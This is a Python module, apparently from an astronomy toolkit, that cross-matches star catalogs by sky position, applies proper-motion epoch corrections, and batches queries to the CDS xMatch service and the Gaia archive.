numpy.arange(len(cat2)) else: idx,d2d,d3d = mc1.match_to_catalog_sky(mc2) m1= numpy.arange(len(cat1)) #", "2000.] colpmDec= ('pmdec') name of the tag in cat with", "# be using smaller batches _cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat) try: ma= cds_load(resultfilename) except", "0.01): warn_about_epoch= True elif 'Gaia DR2' in cat['designation'][0].decode('utf-8'): if numpy.any(numpy.fabs(epoch-2015.5)", "xmatch.cds colRA= ('RA') name of the tag in cat with", "epoch1= cat1['ref_epoch'] else: epoch1= 2000. 
if epoch2 is None: if", "open(posfilename,'r') as posfile: with open(posfilename1,'a') as posfile1: with open(posfilename2,'a') as", "if False do the opposite (important when one of the", "can match back using cds_matchback OUTPUT: (xcat entries for those", "different] swap= (False) if False, find closest matches in cat2", "0: # the case where a class only exists in", "running runs= ''.join([str(int(r)-1) for r in posfilename1.split('csv.')[-1].split('.')]) nruns= 2**len(runs) thisrun1=", "intermediate files os.remove(posfilename1) os.remove(posfilename2) os.remove(resultfilename1) os.remove(resultfilename2) return nruns_necessary def _cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat):", "this by squeezing precision from int64 on source_id as source_id", "0.01): warn_about_epoch= True if warn_about_epoch: warnings.warn(\"You appear to be using", "the tag in cat2 with the declination in degree in", "2015 - Bovy (UofT) 2019-07-07 - add additional catalog field", "to be ICRS) epoch1= (2000.) epoch of the coordinates in", "# Remove intermediate files os.remove(posfilename1) os.remove(posfilename2) os.remove(resultfilename1) os.remove(resultfilename2) return nruns_necessary", "selection= 'best' if selection == 'all': raise NotImplementedError(\"selection='all' CDS cross-match", "== 0 or idx_2.shape[0] == 0: # the case where", "temp_d2d, d3d = mc1[idx_1].match_to_catalog_sky(mc2[idx_2]) m1 = numpy.arange(len(cat1)) idx[cat1[col_field] == unique]", "motion to get both catalogs at the same time dra=cat[colpmRA]/numpy.cos(cat[colDec]/180.*numpy.pi)\\", "from CDS to this path; can match back using cds_matchback", "..load.download import _ERASESTR def xmatch(cat1,cat2,maxdist=2, colRA1='RA',colDec1='DEC',epoch1=None, colRA2='RA',colDec2='DEC',epoch2=None, colpmRA2='pmra',colpmDec2='pmdec', swap=False, col_field=None):", "for unique in uniques: # loop over the class idx_1", "in cat (assumed to be ICRS; includes cos(Dec)) [only used", "catalogs at the same time dra=cat2[colpmRA2]/numpy.cos(cat2[colDec2]/180.*numpy.pi)\\ /3600000.*depoch ddec= cat2[colpmDec2]/3600000.*depoch #", "match back using cds_matchback OUTPUT: (xcat entries for those that", "in posfile: if cnt == 0: cnt+= 1 continue if", "('DEC') name of the tag in cat2 with the declination", "if gaia_all_columns: from astroquery.gaia import Gaia # Write another temporary", "right ascension in degree in cat2 (assumed to be ICRS;", "to be ICRS; includes cos(Dec)) [only used when epoch !=", "colRA1='RA',colDec1='DEC',epoch1=None, colRA2='RA',colDec2='DEC',epoch2=None, colpmRA2='pmra',colpmDec2='pmdec', swap=False, col_field=None): \"\"\" NAME: xmatch PURPOSE: cross-match", "resultfilename= tempfile.mktemp('.csv',dir=os.getcwd()) with open(posfilename,'w') as csvfile: wr= csv.writer(csvfile,delimiter=',',quoting=csv.QUOTE_MINIMAL) wr.writerow(['RA','DEC']) for", "'-F','colDec1=DEC', '-F','cat2=%s' % xcat, 'http://cdsxmatch.u-strasbg.fr/xmatch/api/v1/sync'], stdout=result) except subprocess.CalledProcessError: os.remove(posfilename) if", "= list(data.dtype.names) # construct a list where everything is fp64", "Remove intermediate files os.remove(posfilename1) os.remove(posfilename2) os.remove(resultfilename1) os.remove(resultfilename2) return nruns_necessary def", "selection= ('best') select either all matches or the best match", "not work... 
    mc1= acoords.SkyCoord(cat1[colRA1],cat1[colDec1],
                          unit=(u.degree, u.degree),frame='icrs')
    mc2= acoords.SkyCoord(cat2[colRA2]-dra,cat2[colDec2]-ddec,
                          unit=(u.degree, u.degree),frame='icrs')
    if col_field is not None:
        try: # check if the field actually exists in both cat1/cat2
            cat1[col_field]
            cat2[col_field]
        except KeyError: # works for both python 2/3 format strings
            raise KeyError("'%s' does not exist in both catalogs" % col_field)
        uniques= numpy.unique(cat1[col_field])
        if swap:
            # flag entries with -1 so indices left untouched by the loop below
            # are noticed at the end and filtered out
            d2d= numpy.ones(len(cat2))*-1.
            idx= numpy.zeros(len(cat2),dtype=int)
        else:
            d2d= numpy.ones(len(cat1))*-1.
            idx= numpy.zeros(len(cat1),dtype=int)
        for unique in uniques: # loop over the classes in col_field
            idx_1= numpy.arange(cat1[colRA1].shape[0])[cat1[col_field] == unique]
            idx_2= numpy.arange(cat2[colRA2].shape[0])[cat2[col_field] == unique]
            if idx_1.shape[0] == 0 or idx_2.shape[0] == 0:
                # the case where a class only exists in one catalog but not the other
                continue
            if swap:
                temp_idx, temp_d2d, d3d= mc2[idx_2].match_to_catalog_sky(mc1[idx_1])
                m1= numpy.arange(len(cat2))
                idx[cat2[col_field] == unique]= idx_1[temp_idx]
                d2d[cat2[col_field] == unique]= temp_d2d
            else:
                temp_idx, temp_d2d, d3d= mc1[idx_1].match_to_catalog_sky(mc2[idx_2])
                m1= numpy.arange(len(cat1))
                idx[cat1[col_field] == unique]= idx_2[temp_idx]
                d2d[cat1[col_field] == unique]= temp_d2d
        # make sure d2d finally carries an angular unit, so that the "<"
        # comparison below can complete
        d2d= d2d*temp_d2d.unit
    else:
        if swap:
            idx,d2d,d3d = mc2.match_to_catalog_sky(mc1)
            m1= numpy.arange(len(cat2))
        else:
            idx,d2d,d3d = mc1.match_to_catalog_sky(mc2)
            m1= numpy.arange(len(cat1))
    # the lower bound filters out all negative entries, which were left untouched
    mindx= ((d2d < maxdist*u.arcsec) & (0.*u.arcsec <= d2d))
    m1= m1[mindx]
    m2= idx[mindx]
    if swap:
        return (m2,m1,d2d[mindx])
    else:
        return (m1,m2,d2d[mindx])
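# ---------------------------------------------------------------------------
# Illustrative sketch of an xmatch call on two tiny, made-up structured
# arrays; any record arrays with RA/Dec columns in degrees would work the
# same way. Neither array has a 'ref_epoch' field, so both epochs default to
# J2000 and no proper-motion shift is applied.
def _example_xmatch():
    cat1= numpy.array([(10.68, 41.27), (83.82, -5.39)],
                      dtype=[('RA', 'f8'), ('DEC', 'f8')])
    cat2= numpy.array([(10.68, 41.27), (201.36, -43.02)],
                      dtype=[('RA', 'f8'), ('DEC', 'f8')])
    m1, m2, sep= xmatch(cat1, cat2, maxdist=2)
    # m1/m2 index the matched rows of cat1/cat2; sep holds the angular
    # separation of each matched pair as an astropy Quantity
    return m1, m2, sep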
def cds(cat,xcat='vizier:I/350/gaiaedr3',maxdist=2,colRA='RA',colDec='DEC',
        selection='best',epoch=None,colpmRA='pmra',colpmDec='pmdec',
        savefilename=None,gaia_all_columns=False):
    """
    NAME:
       cds
    PURPOSE:
       Cross-match against a catalog in the CDS archive using the CDS cross-matching service (http://cdsxmatch.u-strasbg.fr/xmatch); uses the curl interface
    INPUT:
       cat - a catalog to cross match, requires 'RA' and 'DEC' keywords (see below)
       xcat= ('vizier:I/350/gaiaedr3') name of the catalog to cross-match against, in a format understood by the CDS cross-matching service (see http://cdsxmatch.u-strasbg.fr/xmatch/doc/available-tables.html; things like 'vizier:Tycho2' or 'vizier:I/345/gaia2')
       maxdist= (2) maximum distance in arcsec
       colRA= ('RA') name of the tag in cat with the right ascension
       colDec= ('DEC') name of the tag in cat with the declination
       selection= ('best') select either all matches or the best match according to CDS (see 'selection' at http://cdsxmatch.u-strasbg.fr/xmatch/doc/API-calls.html)
       epoch= (2000.) epoch of the coordinates in cat
       colpmRA= ('pmra') name of the tag in cat with the proper motion in right ascension in degree in cat (assumed to be ICRS; includes cos(Dec)) [only used when epoch != 2000.]
       colpmDec= ('pmdec') name of the tag in cat with the proper motion in declination in degree in cat (assumed to be ICRS) [only used when epoch != 2000.]
       gaia_all_columns= (False) set to True if you are matching against Gaia DR2 and want *all* columns returned; this runs a query at the Gaia Archive, which may or may not work...
       savefilename= (None) if set, save the output from CDS to this path; can match back using cds_matchback
    OUTPUT:
       (xcat entries for those that match,
        indices into cat of matching sources: index[0] is cat index of xcat[0])
    HISTORY:
       2016-09-12 - Written based on RC catalog code - Bovy (UofT)
       2016-09-21 - Account for Gaia epoch 2015 - Bovy (UofT)
       2018-05-08 - Added gaia_all_columns - Bovy (UofT)
    """
    if selection != 'all': selection= 'best'
    if selection == 'all':
        raise NotImplementedError("selection='all' CDS cross-match not currently implemented")
    if epoch is None:
        if 'ref_epoch' in cat.dtype.fields:
            epoch= cat['ref_epoch']
        else:
            epoch= 2000.
    _check_epoch(cat,epoch)
    depoch= epoch-2000.
    if numpy.any(depoch != 0.):
        # Use proper motion to get both catalogs at the same epoch
        dra= cat[colpmRA]/numpy.cos(cat[colDec]/180.*numpy.pi)\
            /3600000.*depoch
        ddec= cat[colpmDec]/3600000.*depoch
        # Don't shift objects with non-existing proper motion
        dra[numpy.isnan(cat[colpmRA])]= 0.
        ddec[numpy.isnan(cat[colpmDec])]= 0.
    else:
        dra= numpy.zeros(len(cat))
        ddec= numpy.zeros(len(cat))
    # Write positions
    posfilename= tempfile.mktemp('.csv',dir=os.getcwd())
    resultfilename= tempfile.mktemp('.csv',dir=os.getcwd())
    with open(posfilename,'w') as csvfile:
        wr= csv.writer(csvfile,delimiter=',',quoting=csv.QUOTE_MINIMAL)
        wr.writerow(['RA','DEC'])
        for ii in range(len(cat)):
            wr.writerow([(cat[ii][colRA]-dra[ii]+360.) % 360.,
                         cat[ii][colDec]-ddec[ii]])
    _cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat)
    # Directly match on input RA
    ma= cds_load(resultfilename)
    if gaia_all_columns:
        from astroquery.gaia import Gaia
        # Write another temporary file with the XML output of the cross-match
        tab= Table(numpy.array([ma['source_id'],ma['RA'],ma['DEC']]).T,
                   names=('source_id','RA','DEC'),
                   dtype=('int64','float64','float64'))
        xmlfilename= tempfile.mktemp('.xml',dir=os.getcwd())
        tab.write(xmlfilename,format='votable')
        # get the data release....
        table_identifier= xcat.split('/')[-1]
        if table_identifier == 'gaia2':
            table_identifier= 'gaiadr2'
        try:
            job= Gaia.launch_job_async(
                """select g.*, m.RA as mRA, m.DEC as mDEC
from %s.gaia_source as g
inner join tap_upload.my_table as m on m.source_id = g.source_id""" % table_identifier,
                upload_resource=xmlfilename,
                upload_table_name="my_table")
            ma= job.get_results()
        except:
            print("gaia_tools.xmath.cds failed to retrieve all gaia columns, returning just the default returned by the CDS xMatch instead...")
        else:
            ma.rename_column('mra','RA')
            ma.rename_column('mdec','DEC')
        finally:
            os.remove(xmlfilename)
    # Remove temporary files
    os.remove(posfilename)
    if savefilename is None:
        os.remove(resultfilename)
    else:
        shutil.move(resultfilename,savefilename)
    # Match back to the original catalog
    mai= cds_matchback(cat,ma,colRA=colRA,colDec=colDec,epoch=epoch,
                       colpmRA=colpmRA,colpmDec=colpmDec)
    return (ma,mai)
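# ---------------------------------------------------------------------------
# Illustrative sketch of a typical cds() call (requires network access and
# the curl executable; the file name here is made up). Saving the raw CDS
# output via savefilename= allows re-matching later without hitting the
# service again.
def _example_cds(cat):
    ma, mai= cds(cat, xcat='vizier:I/350/gaiaedr3', maxdist=2,
                 savefilename='cds_xmatch_result.csv')
    matched_cat= cat[mai] # rows of cat with a counterpart, aligned with ma
    return ma, matched_cat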
\"<\" operation", "in a format understood by the CDS cross-matching service (see", "catalog maxdist= (2) maximum distance in arcsec colRA1= ('RA') name", "'RA' and 'DEC' keywords (see below) xcat= ('vizier:I/350/gaiaedr3') name of", "the tag in cat2 with the proper motion in right", "each cat1 source, if False do the opposite (important when", "* -1. idx = numpy.zeros(len(cat1), dtype=int) for unique in uniques:", "the declination in degree in cat1 (assumed to be ICRS)", "acoords.SkyCoord(cat1[colRA1],cat1[colDec1], unit=(u.degree, u.degree),frame='icrs') mc2= acoords.SkyCoord(cat2[colRA2]-dra,cat2[colDec2]-ddec, unit=(u.degree, u.degree),frame='icrs') if col_field is", "closest matches in cat2 for each cat1 source, if False", "do the opposite (important when one of the catalogs has", "in cat (assumed to be ICRS) [only used when epoch", "('RA') name of the tag in cat2 with the right", "warnings WIN32= platform.system() == 'Windows' import numpy import astropy.coordinates as", "finally: os.remove(xmlfilename) # Remove temporary files os.remove(posfilename) if savefilename is", "temp_idx, temp_d2d, d3d = mc1[idx_1].match_to_catalog_sky(mc2[idx_2]) m1 = numpy.arange(len(cat1)) idx[cat1[col_field] ==", "== unique] if idx_1.shape[0] == 0 or idx_2.shape[0] == 0:", "# Match back to the original catalog mai= cds_matchback(cat,ma,colRA=colRA,colDec=colDec,epoch=epoch, colpmRA=colpmRA,colpmDec=colpmDec)", "# Don't shift objects with non-existing proper motion dra[numpy.isnan(cat[colpmRA])]= 0.", "except KeyError: # python 2/3 format string raise KeyError(\"'%s' does", "simply cross-match on RA and Dec; if a string, then", "integer anyway # first read everything as fp64 and then", "posfile2.write(posfile.readline()) # Cut in half cnt= 0 with open(posfilename,'r') as", "cnt == 0: cnt+= 1 continue if cnt < num_lines//2:", "d3d = mc2[idx_2].match_to_catalog_sky(mc1[idx_1]) m1 = numpy.arange(len(cat2)) idx[cat2[col_field] == unique] =", "CDS cross-match not currently implemented\") if epoch is None: if", "= mc2[idx_2].match_to_catalog_sky(mc1[idx_1]) m1 = numpy.arange(len(cat2)) idx[cat2[col_field] == unique] = idx_1[temp_idx]", "cnt+= 1 # Can stop counting once this if is", "os import os.path import platform import shutil import subprocess import", "temporary file with the XML output of the cross-match tab=", "nruns_necessary: # Only run this level's match if we don't", "posfilename+'.2' resultfilename1= resultfilename+'.1' resultfilename2= resultfilename+'.2' # Figure out which of", "motion in right ascension in degree in cat2 (assumed to", "dra= numpy.zeros(len(cat)) ddec= numpy.zeros(len(cat)) # xmatch to v. small diff.,", "*original* coords, # not matched coords in CDS mc1= acoords.SkyCoord(cat[colRA]-dra,cat[colDec]-ddec,", "mc1= acoords.SkyCoord(cat1[colRA1],cat1[colDec1], unit=(u.degree, u.degree),frame='icrs') mc2= acoords.SkyCoord(cat2[colRA2]-dra,cat2[colDec2]-ddec, unit=(u.degree, u.degree),frame='icrs') if col_field", "is against *original* coords, # not matched coords in CDS", "upload_table_name=\"my_table\") ma= job.get_results() except: print(\"gaia_tools.xmath.cds failed to retrieve all gaia", "cat1['ref_epoch'] else: epoch1= 2000. 
if epoch2 is None: if 'ref_epoch'", "for r in posfilename.split('csv.')[-1].split('.')]) except ValueError: runs= '' nruns= 2**len(runs)", "proper motion to get both catalogs at the same time", "Gaia # Write another temporary file with the XML output", "in declination in degree in cat (assumed to be ICRS)", "to get both catalogs at the same time dra=cat[colpmRA]/numpy.cos(cat[colDec]/180.*numpy.pi)\\ /3600000.*depoch", "is None: if 'ref_epoch' in cat1.dtype.fields: epoch1= cat1['ref_epoch'] else: epoch1=", "array s.t. \"<\" operation can complete else: if swap: idx,d2d,d3d", "Assume this is the time-out failure pass else: return nruns", "line in resultfile2: if line[0] == 'a': continue resultfile.write(line) #", "if swap: idx,d2d,d3d = mc2.match_to_catalog_sky(mc1) m1= numpy.arange(len(cat2)) else: idx,d2d,d3d =", "== 'a': continue resultfile.write(line) # Remove intermediate files os.remove(posfilename1) os.remove(posfilename2)", "in degree in cat1 (assumed to be ICRS) colDec1= ('DEC')", "epoch-2000. if numpy.any(depoch != 0.): # Use proper motion to", "the batches are small enough to not fail\"\"\" # Figure", "_check_epoch(cat,epoch) depoch= epoch-2000. if numpy.any(depoch != 0.): # Use proper", "platform.system() == 'Windows' import numpy import astropy.coordinates as acoords from", "cat (assumed to be ICRS; includes cos(Dec)) [only used when", "int64 on source_id as source_id is always integer anyway #", "- First catalog cat2 - Second catalog maxdist= (2) maximum", "= numpy.unique(cat1[col_field]) if swap: # times neg one to indicate", "an unit on d2d array s.t. \"<\" operation can complete", "index[0] is cat index of xcat[0] HISTORY: 2016-09-12 - Written", "when one of the catalogs has duplicates) col_field= (None) if", "duplicates) col_field= (None) if None, simply cross-match on RA and", "line in posfile: if cnt == 0: cnt+= 1 continue", "posfilename= tempfile.mktemp('.csv',dir=os.getcwd()) resultfilename= tempfile.mktemp('.csv',dir=os.getcwd()) with open(posfilename,'w') as csvfile: wr= csv.writer(csvfile,delimiter=',',quoting=csv.QUOTE_MINIMAL)", "being int64 dtype_list = [('{}'.format(i), numpy.float64) for i in to_list]", "2018-05-04 - Account for non-zero epoch difference - Bovy (UofT)", "NotImplementedError(\"selection='all' CDS cross-match not currently implemented\") if epoch is None:", "(assumed to be ICRS) [only used when epoch != 2000.]", "swap: # times neg one to indicate those indices untouch", "separation between matching objects) HISTORY: 2016-09-12 - Written - Bovy", "ddec= 0. mc1= acoords.SkyCoord(cat1[colRA1],cat1[colDec1], unit=(u.degree, u.degree),frame='icrs') mc2= acoords.SkyCoord(cat2[colRA2]-dra,cat2[colDec2]-ddec, unit=(u.degree, u.degree),frame='icrs')", "num_lines//2: posfile1.write(line) cnt+= 1 # Can stop counting once this", "\"\"\"CDS xMatch (sometimes?) fails for large matches, because of a", "to be ICRS; includes cos(Dec)) [only used when epochs are", "of the coordinates in cat1 colRA2= ('RA') name of the", "in to_list] dtype_list[dtype_list.index(('source_id', numpy.float64))] = ('source_id', numpy.uint64) return numpy.genfromtxt(filename, delimiter=',',", "else: temp_idx, temp_d2d, d3d = mc1[idx_1].match_to_catalog_sky(mc2[idx_2]) m1 = numpy.arange(len(cat1)) idx[cat1[col_field]", "of xcat[0]) HISTORY: 2016-09-12 - Written based on RC catalog", "Account for Gaia epoch 2015 - Bovy (UofT) 2018-05-08 -", "cat1 (assumed to be ICRS) epoch1= (2000.) 
epoch of the", "already know that we should # be using smaller batches", "HISTORY: 2016-09-12 - Written - Bovy (UofT) 2018-05-04 - Account", "the tag in cat2 with the proper motion in declination", "query at the Gaia Archive, which may or may not", "# Write another temporary file with the XML output of", "- Bovy (UofT) 2019-07-07 - add additional catalog field matching", "objects with non-existing proper motion dra[numpy.isnan(cat[colpmRA])]= 0. ddec[numpy.isnan(cat[colpmDec])]= 0. else:", "in cat['designation'][0].decode('utf-8'): if numpy.any(numpy.fabs(epoch-2015.5) > 0.01): warn_about_epoch= True if warn_about_epoch:", "'ref_epoch' in cat.dtype.fields: epoch= cat['ref_epoch'] else: epoch= 2000. _check_epoch(cat,epoch) depoch=", "unique] = idx_1[temp_idx] d2d[cat2[col_field] == unique] = temp_d2d else: temp_idx,", "= numpy.ones(len(cat1)) * -1. idx = numpy.zeros(len(cat1), dtype=int) for unique", "(assumed to be ICRS) colDec1= ('DEC') name of the tag", "[only used when epochs are different] swap= (False) if False,", "epoch of the coordinates in cat2 colpmRA2= ('pmra') name of", "cat1 with the right ascension in degree in cat1 (assumed", "of the tag in cat with the right ascension colDec=", "cds_matchback(cat,ma,colRA=colRA,colDec=colDec,epoch=epoch, colpmRA=colpmRA,colpmDec=colpmDec) return (ma,mai) def _cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat, nruns_necessary=1): \"\"\"CDS xMatch (sometimes?)", "for line in resultfile1: resultfile.write(line) with open(resultfilename2,'r') as resultfile2: for", "of xcat[0] HISTORY: 2016-09-12 - Written - Bovy (UofT) 2018-05-04", "degree in cat1 (assumed to be ICRS) epoch1= (2000.) epoch", "or idx_2.shape[0] == 0: # the case where a class", "columns, returning just the default returned by the CDS xMatch", "out all neg ones which are untouched mindx= ((d2d <", "in arcsec colRA1= ('RA') name of the tag in cat1", "catalog, but are not setting the epoch to 2015. (DR1)", "because of time-out, split posfilename1= posfilename+'.1' posfilename2= posfilename+'.2' resultfilename1= resultfilename+'.1'", "find closest matches in cat2 for each cat1 source, if", "/3600000.*depoch ddec= cat[colpmDec]/3600000.*depoch # Don't shift objects with non-existing proper", "mc2= acoords.SkyCoord(cat2[colRA2]-dra,cat2[colDec2]-ddec, unit=(u.degree, u.degree),frame='icrs') if col_field is not None: try:", "may or may not work... savefilename= (None) if set, save", "'selection' at http://cdsxmatch.u-strasbg.fr/xmatch/doc/API-calls.html) epoch= (2000.) epoch of the coordinates in", "objects, angular separation between matching objects) HISTORY: 2016-09-12 - Written", "back to the original catalog INPUT cat - original catalog", "epochs are different] swap= (False) if False, find closest matches", "1 # Can stop counting once this if is done", "keep its precision data = numpy.genfromtxt(filename, delimiter=',', skip_header=0, filling_values=-9999.99, names=True,", "tab.write(xmlfilename,format='votable') #get the data release.... 
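# A minimal usage sketch for xmatch (hypothetical data, not part of the
# module): cross-match two small structured arrays with 'RA'/'DEC' columns
# in degrees to within 2 arcsec. Commented out so that importing this module
# has no side effects:
#
#   import numpy
#   cat1= numpy.zeros(2,dtype=[('RA','f8'),('DEC','f8')])
#   cat1['RA']= [10.6847,56.7500]
#   cat1['DEC']= [41.2687,24.1167]
#   cat2= numpy.zeros(3,dtype=[('RA','f8'),('DEC','f8')])
#   cat2['RA']= [10.6848,56.7501,83.8221]
#   cat2['DEC']= [41.2688,24.1168,-5.3911]
#   m1,m2,sep= xmatch(cat1,cat2,maxdist=2)
#   # cat1[m1[i]] matches cat2[m2[i]] with angular separation sep[i]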
def cds(cat,xcat='vizier:I/350/gaiaedr3',maxdist=2,colRA='RA',colDec='DEC',
        selection='best',epoch=None,colpmRA='pmra',colpmDec='pmdec',
        savefilename=None,gaia_all_columns=False):
    """
    NAME:
       cds
    PURPOSE:
       Cross-match against a catalog in the CDS archive using the CDS cross-matching service (http://cdsxmatch.u-strasbg.fr/xmatch); uses the curl interface
    INPUT:
       cat - a catalog to cross match, requires 'RA' and 'DEC' keywords (see below)
       xcat= ('vizier:I/350/gaiaedr3') name of the catalog to cross-match against, in a format understood by the CDS cross-matching service (see http://cdsxmatch.u-strasbg.fr/xmatch/doc/available-tables.html; things like 'vizier:Tycho2' or 'vizier:I/345/gaia2')
       maxdist= (2) maximum distance in arcsec
       colRA= ('RA') name of the tag in cat with the right ascension
       colDec= ('DEC') name of the tag in cat with the declination
       selection= ('best') select either all matches or the best match according to CDS (see 'selection' at http://cdsxmatch.u-strasbg.fr/xmatch/doc/API-calls.html)
       epoch= (2000.) epoch of the coordinates in cat
       colpmRA= ('pmra') name of the tag in cat with the proper motion in right ascension in degree in cat (assumed to be ICRS; includes cos(Dec)) [only used when epoch != 2000.]
       colpmDec= ('pmdec') name of the tag in cat with the proper motion in declination in degree in cat (assumed to be ICRS) [only used when epoch != 2000.]
       gaia_all_columns= (False) set to True if you are matching against Gaia DR2 and want *all* columns returned; this runs a query at the Gaia Archive, which may or may not work...
       savefilename= (None) if set, save the output from CDS to this path; can match back using cds_matchback
    OUTPUT:
       (xcat entries for those that match,
        indices into cat of matching sources: index[0] is cat index of xcat[0])
    HISTORY:
       2016-09-12 - Written based on RC catalog code - Bovy (UofT)
       2016-09-21 - Account for Gaia epoch 2015 - Bovy (UofT)
       2018-05-04 - Account for non-zero epoch difference - Bovy (UofT)
       2018-05-08 - Added gaia_all_columns - Bovy (UofT)
    """
    if epoch is None:
        if 'ref_epoch' in cat.dtype.fields:
            epoch= cat['ref_epoch']
        else:
            epoch= 2000.
    _check_epoch(cat,epoch)
    depoch= epoch-2000.
    if numpy.any(depoch != 0.):
        # Use proper motion to get both catalogs at the same time
        dra= cat[colpmRA]/numpy.cos(cat[colDec]/180.*numpy.pi)\
            /3600000.*depoch
        ddec= cat[colpmDec]/3600000.*depoch
        # Don't shift objects with non-existing proper motion
        dra[numpy.isnan(cat[colpmRA])]= 0.
        ddec[numpy.isnan(cat[colpmDec])]= 0.
    else:
        dra= numpy.zeros(len(cat))
        ddec= numpy.zeros(len(cat))
    if selection != 'all': selection= 'best'
    if selection == 'all':
        raise NotImplementedError("selection='all' CDS cross-match not currently implemented")
    # Write positions
    posfilename= tempfile.mktemp('.csv',dir=os.getcwd())
    resultfilename= tempfile.mktemp('.csv',dir=os.getcwd())
    with open(posfilename,'w') as csvfile:
        wr= csv.writer(csvfile,delimiter=',',quoting=csv.QUOTE_MINIMAL)
        wr.writerow(['RA','DEC'])
        for ii in range(len(cat)):
            wr.writerow([(cat[ii][colRA]-dra[ii]+360.) % 360.,
                         cat[ii][colDec]-ddec[ii]])
    _cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat)
    # Directly match on input RA
    ma= cds_load(resultfilename)
    if gaia_all_columns:
        from astroquery.gaia import Gaia
        # Write another temporary file with the XML output of the cross-match
        tab= Table(numpy.array([ma['source_id'],ma['RA'],ma['DEC']]).T,
                   names=('source_id','RA','DEC'),
                   dtype=('int64','float64','float64'))
        xmlfilename= tempfile.mktemp('.xml',dir=os.getcwd())
        tab.write(xmlfilename,format='votable')
        # Get the data release
        table_identifier= xcat.split('/')[-1]
        if table_identifier == 'gaia2':
            table_identifier= 'gaiadr2'
        try:
            job= Gaia.launch_job_async(
                """select g.*, m.RA as mRA, m.DEC as mDEC
from %s.gaia_source as g
inner join tap_upload.my_table as m on m.source_id = g.source_id""" % table_identifier,
                upload_resource=xmlfilename,
                upload_table_name="my_table")
            ma= job.get_results()
        except:
            print("gaia_tools.xmatch.cds failed to retrieve all Gaia columns, returning just the default returned by the CDS xMatch instead...")
        else:
            ma.rename_column('mra','RA')
            ma.rename_column('mdec','DEC')
        finally:
            os.remove(xmlfilename)
    # Remove temporary files
    os.remove(posfilename)
    if savefilename is None:
        os.remove(resultfilename)
    else:
        shutil.move(resultfilename,savefilename)
    # Match back to the original catalog
    mai= cds_matchback(cat,ma,colRA=colRA,colDec=colDec,epoch=epoch,
                       colpmRA=colpmRA,colpmDec=colpmDec)
    return (ma,mai)
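# A minimal usage sketch for cds (requires curl and network access to the
# CDS xMatch service; 'my_cat' is a hypothetical structured array with
# 'RA'/'DEC' columns in degrees). Commented out so that importing this
# module has no side effects:
#
#   gaia_matches,indices= cds(my_cat,xcat='vizier:I/350/gaiaedr3',maxdist=2,
#                             savefilename='cds_result.csv')
#   # gaia_matches[i] is the xcat entry matched to my_cat[indices[i]]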
def _cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat,
                       nruns_necessary=1):
    """CDS xMatch (sometimes?) fails for large matches, because of a
    time-out, so we recursively split until the batches are small enough
    to not fail"""
    # Figure out which level of the hierarchy we are running
    try:
        runs= ''.join([str(int(r)-1)
                       for r in posfilename.split('csv.')[-1].split('.')])
    except ValueError:
        runs= ''
    nruns= 2**len(runs)
    if nruns >= nruns_necessary:
        # Only run this level's match if we don't already know that we should
        # be using smaller batches
        _cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat)
        try:
            ma= cds_load(resultfilename)
        except ValueError:
            # Assume this is the time-out failure
            pass
        else:
            return nruns
    # xMatch failed because of a time-out, split the input in two
    posfilename1= posfilename+'.1'
    posfilename2= posfilename+'.2'
    resultfilename1= resultfilename+'.1'
    resultfilename2= resultfilename+'.2'
    # Figure out which batches of the hierarchy we are running
    runs= ''.join([str(int(r)-1)
                   for r in posfilename1.split('csv.')[-1].split('.')])
    nruns= 2**len(runs)
    thisrun1= 1+int(runs,2)
    thisrun2= 1+int(''.join([str(int(r)-1)
                    for r in posfilename2.split('csv.')[-1].split('.')]),2)
    # Count the number of objects
    with open(posfilename,'r') as posfile:
        num_lines= sum(1 for line in posfile)
    # Write the header line to both halves
    with open(posfilename1,'w') as posfile1:
        with open(posfilename,'r') as posfile:
            posfile1.write(posfile.readline())
    with open(posfilename2,'w') as posfile2:
        with open(posfilename,'r') as posfile:
            posfile2.write(posfile.readline())
    # Cut in half
    cnt= 0
    with open(posfilename,'r') as posfile:
        with open(posfilename1,'a') as posfile1:
            with open(posfilename2,'a') as posfile2:
                for line in posfile:
                    if cnt == 0:
                        cnt+= 1
                        continue
                    if cnt < num_lines//2:
                        posfile1.write(line)
                        cnt+= 1 # Can stop counting once this if is done
                    else:
                        posfile2.write(line)
    # Run each half
    sys.stdout.write('\r'+"Working on CDS xMatch batch {} / {} ...\r"\
                         .format(thisrun1,nruns))
    sys.stdout.flush()
    nruns_necessary= _cds_match_batched(resultfilename1,posfilename1,
                                        maxdist,selection,xcat,
                                        nruns_necessary=nruns_necessary)
    sys.stdout.write('\r'+"Working on CDS xMatch batch {} / {} ...\r"\
                         .format(thisrun2,nruns))
    sys.stdout.flush()
    nruns_necessary= _cds_match_batched(resultfilename2,posfilename2,
                                        maxdist,selection,xcat,
                                        nruns_necessary=nruns_necessary)
    sys.stdout.write('\r'+_ERASESTR+'\r')
    sys.stdout.flush()
    # Combine results
    with open(resultfilename,'w') as resultfile:
        with open(resultfilename1,'r') as resultfile1:
            for line in resultfile1:
                resultfile.write(line)
        with open(resultfilename2,'r') as resultfile2:
            for line in resultfile2:
                if line[0] == 'a': continue # skip the repeated header line
                resultfile.write(line)
    # Remove intermediate files
    os.remove(posfilename1)
    os.remove(posfilename2)
    os.remove(resultfilename1)
    os.remove(resultfilename2)
    return nruns_necessary
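# How the batch bookkeeping above works, by example: a second-level batch
# file 'pos.csv.1.2' has suffixes ['1','2'] after 'csv.', which map to the
# binary string runs='01'; hence nruns= 2**2= 4 batches exist at this depth
# and thisrun= 1+int('01',2)= 2, i.e., this is batch 2 of 4.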
def _cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat):
    # Send the positions file to CDS for matching
    result= open(resultfilename,'w')
    try:
        subprocess.check_call(['curl',
                               '-X','POST',
                               '-F','request=xmatch',
                               '-F','distMaxArcsec=%i' % maxdist,
                               '-F','selection=%s' % selection,
                               '-F','RESPONSEFORMAT=csv',
                               '-F','cat1=@%s' % os.path.basename(posfilename),
                               '-F','colRA1=RA',
                               '-F','colDec1=DEC',
                               '-F','cat2=%s' % xcat,
                               'http://cdsxmatch.u-strasbg.fr/xmatch/api/v1/sync'],
                              stdout=result)
    except subprocess.CalledProcessError:
        os.remove(posfilename)
        if os.path.exists(resultfilename):
            result.close()
            os.remove(resultfilename)
    result.close()
    return None
